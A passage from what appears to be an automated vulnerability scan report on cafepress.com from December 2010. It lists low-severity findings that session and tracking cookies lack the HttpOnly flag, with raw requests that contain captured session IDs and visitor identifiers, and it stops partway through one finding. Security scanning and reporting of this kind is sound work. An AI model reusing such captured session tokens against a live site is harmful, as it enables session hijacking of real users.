HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59426 Date: Sun, 26 Dec 2010 13:47:02 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/ Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59426 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.11. http://www.cafepress.com/+bumper-stickers
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+bumper-stickers
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+bumper-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 59721 Date: Sun, 26 Dec 2010 13:48:25 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/ Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59721 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.12. http://www.cafepress.com/+buttons
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+buttons
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59616 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59616 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.13. http://www.cafepress.com/+calendars
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+calendars
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+calendars HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 57707 Date: Sun, 26 Dec 2010 13:48:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57707 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.14. http://www.cafepress.com/+clocks
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+clocks
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+clocks HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59318 Date: Sun, 26 Dec 2010 13:48:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/ Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59318 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.15. http://www.cafepress.com/+coasters
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+coasters
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+coasters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59255 Date: Sun, 26 Dec 2010 13:48:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/ Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59255 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+eat_sleep_game_light_tshirt,299007536
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 93204 Date: Sun, 26 Dec 2010 13:49:11 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93204 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.17. http://www.cafepress.com/+framed-prints
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+framed-prints
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
